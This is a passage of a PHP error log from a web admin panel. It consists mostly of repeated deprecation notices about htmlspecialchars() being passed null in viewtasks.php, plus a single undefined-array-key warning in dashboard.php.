/home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [06-Dec-2024 11:41:50 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [06-Dec-2024 11:41:50 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [06-Dec-2024 11:41:50 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [06-Dec-2024 11:41:50 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [06-Dec-2024 11:41:50 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [06-Dec-2024 11:41:50 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [06-Dec-2024 11:41:50 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [06-Dec-2024 11:41:50 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [06-Dec-2024 11:41:50 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [06-Dec-2024 11:41:50 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [06-Dec-2024 11:41:50 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [06-Dec-2024 11:41:50 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [06-Dec-2024 11:41:50 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [06-Dec-2024 11:41:50 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [06-Dec-2024 11:41:50 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [06-Dec-2024 11:41:50 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [06-Dec-2024 11:41:50 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [06-Dec-2024 11:41:50 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [06-Dec-2024 11:41:50 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [06-Dec-2024 11:41:50 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [06-Dec-2024 11:41:50 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [06-Dec-2024 11:41:50 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [06-Dec-2024 11:41:50 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [06-Dec-2024 11:41:50 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [06-Dec-2024 11:41:50 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [06-Dec-2024 11:41:50 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [06-Dec-2024 11:41:50 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [06-Dec-2024 11:41:50 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [06-Dec-2024 11:41:50 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [06-Dec-2024 11:41:50 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [06-Dec-2024 11:41:50 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [06-Dec-2024 11:41:50 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [06-Dec-2024 11:41:50 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [06-Dec-2024 11:41:50 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [06-Dec-2024 11:41:50 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [06-Dec-2024 11:41:50 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [06-Dec-2024 11:41:50 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [06-Dec-2024 11:41:50 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [06-Dec-2024 11:41:50 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [06-Dec-2024 11:41:50 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [06-Dec-2024 11:41:50 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [06-Dec-2024 11:41:50 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [06-Dec-2024 11:41:50 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [06-Dec-2024 11:41:50 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [06-Dec-2024 11:41:50 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [06-Dec-2024 11:41:50 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [06-Dec-2024 11:41:50 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [06-Dec-2024 11:41:50 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [06-Dec-2024 11:41:50 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [06-Dec-2024 11:41:50 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [06-Dec-2024 11:43:58 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [06-Dec-2024 12:08:02 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [06-Dec-2024 12:08:02 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [06-Dec-2024 12:08:02 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [06-Dec-2024 12:08:02 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [06-Dec-2024 12:08:02 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [06-Dec-2024 12:08:02 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [06-Dec-2024 12:08:02 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [06-Dec-2024 12:08:02 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [06-Dec-2024 12:08:02 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [06-Dec-2024 12:08:02 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [06-Dec-2024 12:08:02 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [06-Dec-2024 12:08:02 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [06-Dec-2024 12:08:02 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [06-Dec-2024 12:08:02 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [06-Dec-2024 12:08:02 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [06-Dec-2024 12:08:02 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [06-Dec-2024 12:08:02 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [06-Dec-2024 12:08:02 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [06-Dec-2024 12:08:02 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [06-Dec-2024 12:08:02 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [06-Dec-2024 12:08:02 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [06-Dec-2024 12:08:02 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [06-Dec-2024 12:08:02 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [06-Dec-2024 12:08:02 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [06-Dec-2024 12:08:02 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [06-Dec-2024 12:08:02 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [06-Dec-2024 12:08:02 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [06-Dec-2024 12:08:02 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [06-Dec-2024 12:08:02 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [06-Dec-2024 12:08:02 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [06-Dec-2024 12:08:02 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [06-Dec-2024 12:08:02 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [06-Dec-2024 12:08:02 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [06-Dec-2024 12:08:02 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [06-Dec-2024 12:08:02 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [06-Dec-2024 12:08:02 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [06-Dec-2024 12:08:02 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [06-Dec-2024 12:08:02 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [06-Dec-2024 12:08:02 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [06-Dec-2024 12:08:02 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [06-Dec-2024 12:08:02 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [06-Dec-2024 12:08:02 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [06-Dec-2024 12:08:02 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [06-Dec-2024 12:08:02 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [06-Dec-2024 12:08:02 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [06-Dec-2024 12:08:02 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [06-Dec-2024 12:08:02 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [06-Dec-2024 12:08:02 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [06-Dec-2024 12:08:02 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [06-Dec-2024 12:08:02 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [06-Dec-2024 12:08:02 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [06-Dec-2024 12:08:02 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [06-Dec-2024 12:08:02 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [06-Dec-2024 12:08:02 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [06-Dec-2024 12:08:02 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [06-Dec-2024 12:08:02 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [06-Dec-2024 12:08:02 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [06-Dec-2024 12:08:02 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [06-Dec-2024 12:08:02 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [06-Dec-2024 12:08:02 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [06-Dec-2024 12:08:02 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [06-Dec-2024 12:08:02 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [06-Dec-2024 12:08:02 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [06-Dec-2024 12:08:02 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [06-Dec-2024 12:08:02 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [06-Dec-2024 12:08:02 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [06-Dec-2024 12:08:02 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [06-Dec-2024 12:08:02 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [06-Dec-2024 12:08:02 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [06-Dec-2024 12:08:02 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [06-Dec-2024 12:08:02 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [06-Dec-2024 12:08:02 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [06-Dec-2024 12:08:02 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [06-Dec-2024 12:08:02 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [06-Dec-2024 12:08:02 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [06-Dec-2024 12:08:02 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [06-Dec-2024 12:08:02 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [06-Dec-2024 12:08:02 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [06-Dec-2024 12:08:02 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [06-Dec-2024 12:08:02 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [06-Dec-2024 12:08:02 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [06-Dec-2024 12:08:02 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [06-Dec-2024 12:08:02 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [06-Dec-2024 12:08:02 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [06-Dec-2024 12:08:02 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [06-Dec-2024 12:08:02 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [06-Dec-2024 12:08:02 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [06-Dec-2024 12:08:02 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [06-Dec-2024 12:08:02 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [06-Dec-2024 12:08:02 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [06-Dec-2024 12:08:02 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [06-Dec-2024 12:08:02 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [06-Dec-2024 12:08:02 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [06-Dec-2024 